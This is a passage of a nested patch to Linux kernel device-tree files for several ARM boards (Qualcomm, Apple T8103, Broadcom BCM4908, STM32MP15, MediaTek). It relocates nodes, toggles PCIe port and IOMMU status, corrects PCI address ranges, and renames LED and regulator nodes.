+-			ranges = <0x81000000 0 0x35e00000 0x35e00000 0 0x00010000   /* downstream I/O */
+-				  0x82000000 0 0x32000000 0x32000000 0 0x03e00000>; /* non-prefetchable memory */
++			ranges = <0x81000000 0x0 0x00000000 0x35e00000 0x0 0x00010000   /* I/O */
++				  0x82000000 0x0 0x32000000 0x32000000 0x0 0x03e00000>; /* MEM */
+ 
+ 			interrupts = <GIC_SPI 71 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+diff --git a/arch/arm/boot/dts/qcom-sdx55.dtsi b/arch/arm/boot/dts/qcom-sdx55.dtsi
+index 93d71aff3fab7..e84ca795cae65 100644
+--- a/arch/arm/boot/dts/qcom-sdx55.dtsi
++++ b/arch/arm/boot/dts/qcom-sdx55.dtsi
+@@ -303,6 +303,45 @@
+ 			status = "disabled";
+ 		};
+ 
++		pcie_ep: pcie-ep@1c00000 {
++			compatible = "qcom,sdx55-pcie-ep";
++			reg = <0x01c00000 0x3000>,
++			      <0x40000000 0xf1d>,
++			      <0x40000f20 0xc8>,
++			      <0x40001000 0x1000>,
++			      <0x40200000 0x100000>,
++			      <0x01c03000 0x3000>;
++			reg-names = "parf", "dbi", "elbi", "atu", "addr_space",
++				    "mmio";
++
++			qcom,perst-regs = <&tcsr 0xb258 0xb270>;
++
++			clocks = <&gcc GCC_PCIE_AUX_CLK>,
++				 <&gcc GCC_PCIE_CFG_AHB_CLK>,
++				 <&gcc GCC_PCIE_MSTR_AXI_CLK>,
++				 <&gcc GCC_PCIE_SLV_AXI_CLK>,
++				 <&gcc GCC_PCIE_SLV_Q2A_AXI_CLK>,
++				 <&gcc GCC_PCIE_SLEEP_CLK>,
++				 <&gcc GCC_PCIE_0_CLKREF_CLK>;
++			clock-names = "aux", "cfg", "bus_master", "bus_slave",
++				      "slave_q2a", "sleep", "ref";
++
++			interrupts = <GIC_SPI 140 IRQ_TYPE_LEVEL_HIGH>,
++				     <GIC_SPI 145 IRQ_TYPE_LEVEL_HIGH>;
++			interrupt-names = "global", "doorbell";
++			reset-gpios = <&tlmm 57 GPIO_ACTIVE_LOW>;
++			wake-gpios = <&tlmm 53 GPIO_ACTIVE_LOW>;
++			resets = <&gcc GCC_PCIE_BCR>;
++			reset-names = "core";
++			power-domains = <&gcc PCIE_GDSC>;
++			phys = <&pcie0_lane>;
++			phy-names = "pciephy";
++			max-link-speed = <3>;
++			num-lanes = <2>;
++
++			status = "disabled";
++		};
++
+ 		pcie0_phy: phy@1c07000 {
+ 			compatible = "qcom,sdx55-qmp-pcie-phy";
+ 			reg = <0x01c07000 0x1c4>;
+@@ -400,45 +439,6 @@
+ 			status = "disabled";
+ 		};
+ 
+-		pcie_ep: pcie-ep@40000000 {
+-			compatible = "qcom,sdx55-pcie-ep";
+-			reg = <0x01c00000 0x3000>,
+-			      <0x40000000 0xf1d>,
+-			      <0x40000f20 0xc8>,
+-			      <0x40001000 0x1000>,
+-			      <0x40200000 0x100000>,
+-			      <0x01c03000 0x3000>;
+-			reg-names = "parf", "dbi", "elbi", "atu", "addr_space",
+-				    "mmio";
+-
+-			qcom,perst-regs = <&tcsr 0xb258 0xb270>;
+-
+-			clocks = <&gcc GCC_PCIE_AUX_CLK>,
+-				 <&gcc GCC_PCIE_CFG_AHB_CLK>,
+-				 <&gcc GCC_PCIE_MSTR_AXI_CLK>,
+-				 <&gcc GCC_PCIE_SLV_AXI_CLK>,
+-				 <&gcc GCC_PCIE_SLV_Q2A_AXI_CLK>,
+-				 <&gcc GCC_PCIE_SLEEP_CLK>,
+-				 <&gcc GCC_PCIE_0_CLKREF_CLK>;
+-			clock-names = "aux", "cfg", "bus_master", "bus_slave",
+-				      "slave_q2a", "sleep", "ref";
+-
+-			interrupts = <GIC_SPI 140 IRQ_TYPE_LEVEL_HIGH>,
+-				     <GIC_SPI 145 IRQ_TYPE_LEVEL_HIGH>;
+-			interrupt-names = "global", "doorbell";
+-			reset-gpios = <&tlmm 57 GPIO_ACTIVE_LOW>;
+-			wake-gpios = <&tlmm 53 GPIO_ACTIVE_LOW>;
+-			resets = <&gcc GCC_PCIE_BCR>;
+-			reset-names = "core";
+-			power-domains = <&gcc PCIE_GDSC>;
+-			phys = <&pcie0_lane>;
+-			phy-names = "pciephy";
+-			max-link-speed = <3>;
+-			num-lanes = <2>;
+-
+-			status = "disabled";
+-		};
+-
+ 		remoteproc_mpss: remoteproc@4080000 {
+ 			compatible = "qcom,sdx55-mpss-pas";
+ 			reg = <0x04080000 0x4040>;
+diff --git a/arch/arm/boot/dts/stm32mp15-pinctrl.dtsi b/arch/arm/boot/dts/stm32mp15-pinctrl.dtsi
+index a9d2bec990141..e15a3b2a9b399 100644
+--- a/arch/arm/boot/dts/stm32mp15-pinctrl.dtsi
++++ b/arch/arm/boot/dts/stm32mp15-pinctrl.dtsi
+@@ -1880,6 +1880,21 @@
+ 		};
+ 	};
+ 
++	spi1_pins_b: spi1-1 {
++		pins1 {
++			pinmux = <STM32_PINMUX('A', 5, AF5)>, /* SPI1_SCK */
++				 <STM32_PINMUX('B', 5, AF5)>; /* SPI1_MOSI */
++			bias-disable;
++			drive-push-pull;
++			slew-rate = <1>;
++		};
++
++		pins2 {
++			pinmux = <STM32_PINMUX('A', 6, AF5)>; /* SPI1_MISO */
++			bias-disable;
++		};
++	};
++
+ 	spi2_pins_a: spi2-0 {
+ 		pins1 {
+ 			pinmux = <STM32_PINMUX('B', 10, AF5)>, /* SPI2_SCK */
+@@ -2448,19 +2463,4 @@
+ 			bias-disable;
+ 		};
+ 	};
+-
+-	spi1_pins_b: spi1-1 {
+-		pins1 {
+-			pinmux = <STM32_PINMUX('A', 5, AF5)>, /* SPI1_SCK */
+-				 <STM32_PINMUX('B', 5, AF5)>; /* SPI1_MOSI */
+-			bias-disable;
+-			drive-push-pull;
+-			slew-rate = <1>;
+-		};
+-
+-		pins2 {
+-			pinmux = <STM32_PINMUX('A', 6, AF5)>; /* SPI1_MISO */
+-			bias-disable;
+-		};
+-	};
+ };
+diff --git a/arch/arm64/boot/dts/apple/t8103-j274.dts b/arch/arm64/boot/dts/apple/t8103-j274.dts
+index b52ddc4098939..1c3e37f86d46d 100644
+--- a/arch/arm64/boot/dts/apple/t8103-j274.dts
++++ b/arch/arm64/boot/dts/apple/t8103-j274.dts
+@@ -37,10 +37,12 @@
+ 
+ &port01 {
+ 	bus-range = <2 2>;
++	status = "okay";
+ };
+ 
+ &port02 {
+ 	bus-range = <3 3>;
++	status = "okay";
+ 	ethernet0: ethernet@0,0 {
+ 		reg = <0x30000 0x0 0x0 0x0 0x0>;
+ 		/* To be filled by the loader */
+@@ -48,6 +50,14 @@
+ 	};
+ };
+ 
++&pcie0_dart_1 {
++	status = "okay";
++};
++
++&pcie0_dart_2 {
++	status = "okay";
++};
++
+ &i2c2 {
+ 	status = "okay";
+ };
+diff --git a/arch/arm64/boot/dts/apple/t8103-j293.dts b/arch/arm64/boot/dts/apple/t8103-j293.dts
+index 151074109a114..c363dfef80709 100644
+--- a/arch/arm64/boot/dts/apple/t8103-j293.dts
++++ b/arch/arm64/boot/dts/apple/t8103-j293.dts
+@@ -25,21 +25,6 @@
+ 	brcm,board-type = "apple,honshu";
+ };
+ 
+-/*
+- * Remove unused PCIe ports and disable the associated DARTs.
+- */
+-
+-&pcie0_dart_1 {
+-	status = "disabled";
+-};
+-
+-&pcie0_dart_2 {
+-	status = "disabled";
+-};
+-
+-/delete-node/ &port01;
+-/delete-node/ &port02;
+-
+ &i2c2 {
+ 	status = "okay";
+ };
+diff --git a/arch/arm64/boot/dts/apple/t8103-j313.dts b/arch/arm64/boot/dts/apple/t8103-j313.dts
+index bc1f865aa7909..08409be1cf357 100644
+--- a/arch/arm64/boot/dts/apple/t8103-j313.dts
++++ b/arch/arm64/boot/dts/apple/t8103-j313.dts
+@@ -24,18 +24,3 @@
+ &wifi0 {
+ 	brcm,board-type = "apple,shikoku";
+ };
+-
+-/*
+- * Remove unused PCIe ports and disable the associated DARTs.
+- */
+-
+-&pcie0_dart_1 {
+-	status = "disabled";
+-};
+-
+-&pcie0_dart_2 {
+-	status = "disabled";
+-};
+-
+-/delete-node/ &port01;
+-/delete-node/ &port02;
+diff --git a/arch/arm64/boot/dts/apple/t8103-j456.dts b/arch/arm64/boot/dts/apple/t8103-j456.dts
+index 2db425ceb30f6..58c8e43789b48 100644
+--- a/arch/arm64/boot/dts/apple/t8103-j456.dts
++++ b/arch/arm64/boot/dts/apple/t8103-j456.dts
+@@ -55,13 +55,23 @@
+ 
+ &port01 {
+ 	bus-range = <2 2>;
++	status = "okay";
+ };
+ 
+ &port02 {
+ 	bus-range = <3 3>;
++	status = "okay";
+ 	ethernet0: ethernet@0,0 {
+ 		reg = <0x30000 0x0 0x0 0x0 0x0>;
+ 		/* To be filled by the loader */
+ 		local-mac-address = [00 10 18 00 00 00];
+ 	};
+ };
++
++&pcie0_dart_1 {
++	status = "okay";
++};
++
++&pcie0_dart_2 {
++	status = "okay";
++};
+diff --git a/arch/arm64/boot/dts/apple/t8103-j457.dts b/arch/arm64/boot/dts/apple/t8103-j457.dts
+index 3821ff146c56b..152f95fd49a21 100644
+--- a/arch/arm64/boot/dts/apple/t8103-j457.dts
++++ b/arch/arm64/boot/dts/apple/t8103-j457.dts
+@@ -37,6 +37,7 @@
+ 
+ &port02 {
+ 	bus-range = <3 3>;
++	status = "okay";
+ 	ethernet0: ethernet@0,0 {
+ 		reg = <0x30000 0x0 0x0 0x0 0x0>;
+ 		/* To be filled by the loader */
+@@ -44,12 +45,6 @@
+ 	};
+ };
+ 
+-/*
+- * Remove unused PCIe port and disable the associated DART.
+- */
+-
+-&pcie0_dart_1 {
+-	status = "disabled";
++&pcie0_dart_2 {
++	status = "okay";
+ };
+-
+-/delete-node/ &port01;
+diff --git a/arch/arm64/boot/dts/apple/t8103.dtsi b/arch/arm64/boot/dts/apple/t8103.dtsi
+index 9859219699f45..87a9c1ba6d0f4 100644
+--- a/arch/arm64/boot/dts/apple/t8103.dtsi
++++ b/arch/arm64/boot/dts/apple/t8103.dtsi
+@@ -724,6 +724,7 @@
+ 			interrupt-parent = <&aic>;
+ 			interrupts = <AIC_IRQ 699 IRQ_TYPE_LEVEL_HIGH>;
+ 			power-domains = <&ps_apcie_gp>;
++			status = "disabled";
+ 		};
+ 
+ 		pcie0_dart_2: iommu@683008000 {
+@@ -733,6 +734,7 @@
+ 			interrupt-parent = <&aic>;
+ 			interrupts = <AIC_IRQ 702 IRQ_TYPE_LEVEL_HIGH>;
+ 			power-domains = <&ps_apcie_gp>;
++			status = "disabled";
+ 		};
+ 
+ 		pcie0: pcie@690000000 {
+@@ -807,6 +809,7 @@
+ 						<0 0 0 2 &port01 0 0 0 1>,
+ 						<0 0 0 3 &port01 0 0 0 2>,
+ 						<0 0 0 4 &port01 0 0 0 3>;
++				status = "disabled";
+ 			};
+ 
+ 			port02: pci@2,0 {
+@@ -826,6 +829,7 @@
+ 						<0 0 0 2 &port02 0 0 0 1>,
+ 						<0 0 0 3 &port02 0 0 0 2>,
+ 						<0 0 0 4 &port02 0 0 0 3>;
++				status = "disabled";
+ 			};
+ 		};
+ 	};
+diff --git a/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908-asus-gt-ac5300.dts b/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908-asus-gt-ac5300.dts
+index 839ca33178b01..d94a53d68320b 100644
+--- a/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908-asus-gt-ac5300.dts
++++ b/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908-asus-gt-ac5300.dts
+@@ -120,7 +120,7 @@
+ };
+ 
+ &leds {
+-	led-power@11 {
++	led@11 {
+ 		reg = <0x11>;
+ 		function = LED_FUNCTION_POWER;
+ 		color = <LED_COLOR_ID_WHITE>;
+@@ -130,7 +130,7 @@
+ 		pinctrl-0 = <&pins_led_17_a>;
+ 	};
+ 
+-	led-wan-red@12 {
++	led@12 {
+ 		reg = <0x12>;
+ 		function = LED_FUNCTION_WAN;
+ 		color = <LED_COLOR_ID_RED>;
+@@ -139,7 +139,7 @@
+ 		pinctrl-0 = <&pins_led_18_a>;
+ 	};
+ 
+-	led-wps@14 {
++	led@14 {
+ 		reg = <0x14>;
+ 		function = LED_FUNCTION_WPS;
+ 		color = <LED_COLOR_ID_WHITE>;
+@@ -148,7 +148,7 @@
+ 		pinctrl-0 = <&pins_led_20_a>;
+ 	};
+ 
+-	led-wan-white@15 {
++	led@15 {
+ 		reg = <0x15>;
+ 		function = LED_FUNCTION_WAN;
+ 		color = <LED_COLOR_ID_WHITE>;
+@@ -157,7 +157,7 @@
+ 		pinctrl-0 = <&pins_led_21_a>;
+ 	};
+ 
+-	led-lan@19 {
++	led@19 {
+ 		reg = <0x19>;
+ 		function = LED_FUNCTION_LAN;
+ 		color = <LED_COLOR_ID_WHITE>;
+diff --git a/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908.dtsi b/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908.dtsi
+index eb2a78f4e0332..343b320cbd746 100644
+--- a/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908.dtsi
++++ b/arch/arm64/boot/dts/broadcom/bcmbca/bcm4908.dtsi
+@@ -254,7 +254,7 @@
+ 			};
+ 		};
+ 
+-		procmon: syscon@280000 {
++		procmon: bus@280000 {
+ 			compatible = "simple-bus";
+ 			reg = <0x280000 0x1000>;
+ 			ranges;
+@@ -538,7 +538,7 @@
+ 			reg = <0x1800 0x600>, <0x2000 0x10>;
+ 			reg-names = "nand", "nand-int-base";
+ 			interrupts = <GIC_SPI 37 IRQ_TYPE_LEVEL_HIGH>;
+-			interrupt-names = "nand";
++			interrupt-names = "nand_ctlrdy";
+ 			status = "okay";
+ 
+ 			nandcs: nand@0 {
+diff --git a/arch/arm64/boot/dts/mediatek/mt8192-asurada.dtsi b/arch/arm64/boot/dts/mediatek/mt8192-asurada.dtsi
+index 4b314435f8fd6..50367da93cd79 100644
+--- a/arch/arm64/boot/dts/mediatek/mt8192-asurada.dtsi
++++ b/arch/arm64/boot/dts/mediatek/mt8192-asurada.dtsi
+@@ -935,7 +935,7 @@
+ 				regulator-compatible = "vbuck1";
+ 				regulator-name = "Vgpu";
+ 				regulator-min-microvolt = <606250>;
+-				regulator-max-microvolt = <1193750>;
++				regulator-max-microvolt = <800000>;
+ 				regulator-enable-ramp-delay = <256>;
+ 				regulator-allowed-modes = <0 1 2>;
+ 			};
+diff --git a/arch/arm64/boot/dts/qcom/apq8096-db820c.dts b/arch/arm64/boot/dts/qcom/apq8096-db820c.dts
+index fe6c415e82297..5251dbcab4d90 100644
+--- a/arch/arm64/boot/dts/qcom/apq8096-db820c.dts
++++ b/arch/arm64/boot/dts/qcom/apq8096-db820c.dts
+@@ -706,8 +706,7 @@
+ &pmi8994_spmi_regulators {
+ 	vdd_s2-supply = <&vph_pwr>;
+ 
+-	vdd_gfx: s2@1700 {
+-		reg = <0x1700 0x100>;
++	vdd_gfx: s2 {
+ 		regulator-name = "VDD_GFX";
+ 		regulator-min-microvolt = <980000>;
+ 		regulator-max-microvolt = <980000>;
+diff --git a/arch/arm64/boot/dts/qcom/ipq6018.dtsi b/arch/arm64/boot/dts/qcom/ipq6018.dtsi
+index 5d453f11acd98..4663e23cd94f4 100644
+--- a/arch/arm64/boot/dts/qcom/ipq6018.dtsi
++++ b/arch/arm64/boot/dts/qcom/ipq6018.dtsi
+@@ -96,26 +96,31 @@
+ 			opp-microvolt = <725000>;
+ 			clock-latency-ns = <200000>;
+ 		};
++
+ 		opp-1056000000 {
+ 			opp-hz = /bits/ 64 <1056000000>;
+ 			opp-microvolt = <787500>;
+ 			clock-latency-ns = <200000>;
+ 		};
++
+ 		opp-1320000000 {
+ 			opp-hz = /bits/ 64 <1320000000>;
+ 			opp-microvolt = <862500>;
+ 			clock-latency-ns = <200000>;
+ 		};
++
+ 		opp-1440000000 {
+ 			opp-hz = /bits/ 64 <1440000000>;
+ 			opp-microvolt = <925000>;
+ 			clock-latency-ns = <200000>;
+ 		};
++
+ 		opp-1608000000 {
+ 			opp-hz = /bits/ 64 <1608000000>;
+ 			opp-microvolt = <987500>;
+ 			clock-latency-ns = <200000>;
+ 		};
++
+ 		opp-1800000000 {
+ 			opp-hz = /bits/ 64 <1800000000>;
+ 			opp-microvolt = <1062500>;
+@@ -131,8 +136,7 @@
+ 
+ 	pmuv8: pmu {
+ 		compatible = "arm,cortex-a53-pmu";
+-		interrupts = <GIC_PPI 7 (GIC_CPU_MASK_SIMPLE(4) |
+-					 IRQ_TYPE_LEVEL_HIGH)>;
++		interrupts = <GIC_PPI 7 (GIC_CPU_MASK_SIMPLE(4) | IRQ_TYPE_LEVEL_HIGH)>;
+ 	};
+ 
+ 	psci: psci {
+@@ -437,24 +441,18 @@
+ 			phys = <&pcie_phy0>;
+ 			phy-names = "pciephy";
+ 
+-			ranges = <0x81000000 0 0x20200000 0 0x20200000
+-				  0 0x10000>, /* downstream I/O */
+-				 <0x82000000 0 0x20220000 0 0x20220000
+-				  0 0xfde0000>; /* non-prefetchable memory */
++			ranges = <0x81000000 0x0 0x00000000 0x0 0x20200000 0x0 0x10000>,
++				 <0x82000000 0x0 0x20220000 0x0 0x20220000 0x0 0xfde0000>;
+ 
+ 			interrupts = <GIC_SPI 52 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+ 
+ 			#interrupt-cells = <1>;
+ 			interrupt-map-mask = <0 0 0 0x7>;
+-			interrupt-map = <0 0 0 1 &intc 0 75
+-					 IRQ_TYPE_LEVEL_HIGH>, /* int_a */
+-					<0 0 0 2 &intc 0 78
+-					 IRQ_TYPE_LEVEL_HIGH>, /* int_b */
+-					<0 0 0 3 &intc 0 79
+-					 IRQ_TYPE_LEVEL_HIGH>, /* int_c */
+-					<0 0 0 4 &intc 0 83
+-					 IRQ_TYPE_LEVEL_HIGH>; /* int_d */
++			interrupt-map = <0 0 0 1 &intc 0 75 IRQ_TYPE_LEVEL_HIGH>, /* int_a */
++					<0 0 0 2 &intc 0 78 IRQ_TYPE_LEVEL_HIGH>, /* int_b */
++					<0 0 0 3 &intc 0 79 IRQ_TYPE_LEVEL_HIGH>, /* int_c */
++					<0 0 0 4 &intc 0 83 IRQ_TYPE_LEVEL_HIGH>; /* int_d */
+ 
+ 			clocks = <&gcc GCC_SYS_NOC_PCIE0_AXI_CLK>,
+ 				 <&gcc GCC_PCIE0_AXI_M_CLK>,
+diff --git a/arch/arm64/boot/dts/qcom/ipq8074.dtsi b/arch/arm64/boot/dts/qcom/ipq8074.dtsi
+index 4294beeb494fd..ffb50e5ea2efd 100644
+--- a/arch/arm64/boot/dts/qcom/ipq8074.dtsi
++++ b/arch/arm64/boot/dts/qcom/ipq8074.dtsi
+@@ -772,10 +772,8 @@
+ 			phys = <&pcie_phy1>;
+ 			phy-names = "pciephy";
+ 
+-			ranges = <0x81000000 0 0x10200000 0x10200000
+-				  0 0x10000>,   /* downstream I/O */
+-				 <0x82000000 0 0x10220000 0x10220000
+-				  0 0xfde0000>; /* non-prefetchable memory */
++			ranges = <0x81000000 0x0 0x00000000 0x10200000 0x0 0x10000>,   /* I/O */
++				 <0x82000000 0x0 0x10220000 0x10220000 0x0 0xfde0000>; /* MEM */
+ 
+ 			interrupts = <GIC_SPI 85 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+@@ -836,10 +834,8 @@
+ 			phys = <&pcie_phy0>;
+ 			phy-names = "pciephy";
+ 
+-			ranges = <0x81000000 0 0x20200000 0x20200000
+-				  0 0x10000>, /* downstream I/O */
+-				 <0x82000000 0 0x20220000 0x20220000
+-				  0 0xfde0000>; /* non-prefetchable memory */
++			ranges = <0x81000000 0x0 0x00000000 0x20200000 0x0 0x10000>,   /* I/O */
++				 <0x82000000 0x0 0x20220000 0x20220000 0x0 0xfde0000>; /* MEM */
+ 
+ 			interrupts = <GIC_SPI 52 IRQ_TYPE_LEVEL_HIGH>;
+ 			interrupt-names = "msi";
+diff --git a/arch/arm64/boot/dts/qcom/msm8956-sony-xperia-loire.dtsi b/arch/arm64/boot/dts/qcom/msm8956-sony-xperia-loire.dtsi
+index 67baced639c91..085d79542e1bb 100644
+--- a/arch/arm64/boot/dts/qcom/msm8956-sony-xperia-loire.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8956-sony-xperia-loire.dtsi
+@@ -280,3 +280,7 @@
+ 	vdda3p3-supply = <&pm8950_l13>;
+ 	status = "okay";
+ };
++
++&xo_board {
++	clock-frequency = <19200000>;
++};
+diff --git a/arch/arm64/boot/dts/qcom/msm8976.dtsi b/arch/arm64/boot/dts/qcom/msm8976.dtsi
+index 05dcb30b07795..c125ebcdd1e47 100644
+--- a/arch/arm64/boot/dts/qcom/msm8976.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8976.dtsi
+@@ -20,6 +20,13 @@
+ 
+ 	chosen { };
+ 
++	clocks {
++		xo_board: xo-board {
++			compatible = "fixed-clock";
++			#clock-cells = <0>;
++		};
++	};
++
+ 	cpus {
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+@@ -351,6 +358,8 @@
+ 
+ 				rpmcc: clock-controller {
+ 					compatible = "qcom,rpmcc-msm8976", "qcom,rpmcc";
++					clocks = <&xo_board>;
++					clock-names = "xo";
+ 					#clock-cells = <1>;
+ 				};
+ 
+diff --git a/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead.dtsi b/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead.dtsi
+index cd77dcb558722..b8f2a01bcb96c 100644
+--- a/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8992-lg-bullhead.dtsi
+@@ -60,11 +60,6 @@
+ 			reg = <0x0 0x05000000 0x0 0x1a00000>;
+ 			no-map;
+ 		};
+-
+-		reserved@6c00000 {
+-			reg = <0x0 0x06c00000 0x0 0x400000>;
+-			no-map;
+-		};
+ 	};
+ };
+ 
+diff --git a/arch/arm64/boot/dts/qcom/msm8994-huawei-angler-rev-101.dts b/arch/arm64/boot/dts/qcom/msm8994-huawei-angler-rev-101.dts
+index 7b0f62144c3ee..29e79ae0849d8 100644
+--- a/arch/arm64/boot/dts/qcom/msm8994-huawei-angler-rev-101.dts
++++ b/arch/arm64/boot/dts/qcom/msm8994-huawei-angler-rev-101.dts
+@@ -2,7 +2,7 @@
+ /*
+  * Copyright (c) 2015, Huawei Inc. All rights reserved.
+  * Copyright (c) 2016, The Linux Foundation. All rights reserved.
+- * Copyright (c) 2021-2022, Petr Vorel <petr.vorel@gmail.com>
++ * Copyright (c) 2021-2023, Petr Vorel <petr.vorel@gmail.com>
+  */
+ 
+ /dts-v1/;
+@@ -31,13 +31,18 @@
+ 		#size-cells = <2>;
+ 		ranges;
+ 
++		cont_splash_mem: memory@3401000 {
++			reg = <0 0x03401000 0 0x1000000>;
++			no-map;
++		};
++
+ 		tzapp_mem: tzapp@4800000 {
+ 			reg = <0 0x04800000 0 0x1900000>;
+ 			no-map;
+ 		};
+ 
+-		removed_region: reserved@6300000 {
+-			reg = <0 0x06300000 0 0xD00000>;
++		reserved@6300000 {
++			reg = <0 0x06300000 0 0x700000>;
+ 			no-map;
+ 		};
+ 	};
+diff --git a/arch/arm64/boot/dts/qcom/msm8994-msft-lumia-octagon.dtsi b/arch/arm64/boot/dts/qcom/msm8994-msft-lumia-octagon.dtsi
+index 9b67f0d3820cd..63dda2ab06241 100644
+--- a/arch/arm64/boot/dts/qcom/msm8994-msft-lumia-octagon.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8994-msft-lumia-octagon.dtsi
+@@ -542,8 +542,7 @@
+ };
+ 
+ &pmi8994_spmi_regulators {
+-	vdd_gfx: s2@1700 {
+-		reg = <0x1700 0x100>;
++	vdd_gfx: s2 {
+ 		regulator-min-microvolt = <980000>;
+ 		regulator-max-microvolt = <980000>;
+ 	};
+diff --git a/arch/arm64/boot/dts/qcom/msm8994-sony-xperia-kitakami.dtsi b/arch/arm64/boot/dts/qcom/msm8994-sony-xperia-kitakami.dtsi
+index f3d153c349188..db2282c9f68bf 100644
+--- a/arch/arm64/boot/dts/qcom/msm8994-sony-xperia-kitakami.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8994-sony-xperia-kitakami.dtsi
+@@ -173,8 +173,7 @@
+ 	 * power domain.. which still isn't enough and forces us to bind
+ 	 * OXILI_CX and OXILI_GX together!
+ 	 */
+-	vdd_gfx: s2@1700 {
+-		reg = <0x1700 0x100>;
++	vdd_gfx: s2 {
+ 		regulator-name = "VDD_GFX";
+ 		regulator-min-microvolt = <980000>;
+ 		regulator-max-microvolt = <980000>;
+diff --git a/arch/arm64/boot/dts/qcom/msm8994.dtsi b/arch/arm64/boot/dts/qcom/msm8994.dtsi
+index 9ff9d35496d21..24c3fced8df71 100644
+--- a/arch/arm64/boot/dts/qcom/msm8994.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8994.dtsi
+@@ -228,6 +228,11 @@
+ 			reg = <0 0xc9400000 0 0x3f00000>;
+ 			no-map;
+ 		};
++
++		reserved@6c00000 {
++			reg = <0 0x06c00000 0 0x400000>;
++			no-map;
++		};
+ 	};
+ 
+ 	smd {
+diff --git a/arch/arm64/boot/dts/qcom/msm8996.dtsi b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+index 71678749d66f6..25d97cc2d08ff 100644
+--- a/arch/arm64/boot/dts/qcom/msm8996.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8996.dtsi
+@@ -1841,8 +1841,8 @@
+ 
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+-				ranges = <0x01000000 0x0 0x0c200000 0x0c200000 0x0 0x100000>,
+-					<0x02000000 0x0 0x0c300000 0x0c300000 0x0 0xd00000>;
++				ranges = <0x01000000 0x0 0x00000000 0x0c200000 0x0 0x100000>,
++					 <0x02000000 0x0 0x0c300000 0x0c300000 0x0 0xd00000>;
+ 
+ 				device_type = "pci";
+ 
+@@ -1895,8 +1895,8 @@
+ 
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+-				ranges = <0x01000000 0x0 0x0d200000 0x0d200000 0x0 0x100000>,
+-					<0x02000000 0x0 0x0d300000 0x0d300000 0x0 0xd00000>;
++				ranges = <0x01000000 0x0 0x00000000 0x0d200000 0x0 0x100000>,
++					 <0x02000000 0x0 0x0d300000 0x0d300000 0x0 0xd00000>;
+ 
+ 				device_type = "pci";
+ 
+@@ -1946,8 +1946,8 @@
+ 
+ 				#address-cells = <3>;
+ 				#size-cells = <2>;
+-				ranges = <0x01000000 0x0 0x0e200000 0x0e200000 0x0 0x100000>,
+-					<0x02000000 0x0 0x0e300000 0x0e300000 0x0 0x1d00000>;
++				ranges = <0x01000000 0x0 0x00000000 0x0e200000 0x0 0x100000>,
++					 <0x02000000 0x0 0x0e300000 0x0e300000 0x0 0x1d00000>;
+ 
+ 				device_type = "pci";
+ 
+diff --git a/arch/arm64/boot/dts/qcom/msm8998-oneplus-cheeseburger.dts b/arch/arm64/boot/dts/qcom/msm8998-oneplus-cheeseburger.dts
+index 9fb1fb9b85298..794e9f2ab77ab 100644
+--- a/arch/arm64/boot/dts/qcom/msm8998-oneplus-cheeseburger.dts
++++ b/arch/arm64/boot/dts/qcom/msm8998-oneplus-cheeseburger.dts
+@@ -34,7 +34,7 @@
+ &pmi8998_gpio {
+ 	button_backlight_default: button-backlight-state {
+ 		pins = "gpio5";
+-		function = "gpio";
++		function = "normal";
+ 		bias-pull-down;
+ 		qcom,drive-strength = <PMIC_GPIO_STRENGTH_NO>;
+ 	};
+diff --git a/arch/arm64/boot/dts/qcom/msm8998.dtsi b/arch/arm64/boot/dts/qcom/msm8998.dtsi
+index 539382dab0ada..c8c76338ae18b 100644
+--- a/arch/arm64/boot/dts/qcom/msm8998.dtsi
++++ b/arch/arm64/boot/dts/qcom/msm8998.dtsi
+@@ -916,7 +916,7 @@
+ 			phy-names = "pciephy";
+ 			status = "disabled";
+ 
+-			ranges = <0x01000000 0x0 0x1b200000 0x1b200000 0x0 0x100000>,
++			ranges = <0x01000000 0x0 0x00000000 0x1b200000 0x0 0x100000>,
+ 				 <0x02000000 0x0 0x1b300000 0x1b300000 0x0 0xd00000>;
+ 
+ 			#interrupt-cells = <1>;
+@@ -1514,7 +1514,7 @@
+ 			compatible = "arm,coresight-stm", "arm,primecell";
+ 			reg = <0x06002000 0x1000>,
+ 			      <0x16280000 0x180000>;
+-			reg-names = "stm-base", "stm-data-base";
++			reg-names = "stm-base", "stm-stimulus-base";
+ 			status = "disabled";
+ 
+ 			clocks = <&rpmcc RPM_SMD_QDSS_CLK>, <&rpmcc RPM_SMD_QDSS_A_CLK>;
+diff --git a/arch/arm64/boot/dts/qcom/pmi8994.dtsi b/arch/arm64/boot/dts/qcom/pmi8994.dtsi
+index a0af91698d497..0192968f4d9b3 100644
+--- a/arch/arm64/boot/dts/qcom/pmi8994.dtsi
++++ b/arch/arm64/boot/dts/qcom/pmi8994.dtsi
+@@ -49,8 +49,6 @@
+ 
+ 		pmi8994_spmi_regulators: regulators {
+ 			compatible = "qcom,pmi8994-regulators";
+-			#address-cells = <1>;
+-			#size-cells = <1>;
+ 		};
+ 
+ 		pmi8994_wled: wled@d800 {
+diff --git a/arch/arm64/boot/dts/qcom/sc7180-trogdor-lazor-limozeen-nots-r4.dts b/arch/arm64/boot/dts/qcom/sc7180-trogdor-lazor-limozeen-nots-r4.dts
+index 850776c5323d1..70d5a7aa88735 100644
+--- a/arch/arm64/boot/dts/qcom/sc7180-trogdor-lazor-limozeen-nots-r4.dts
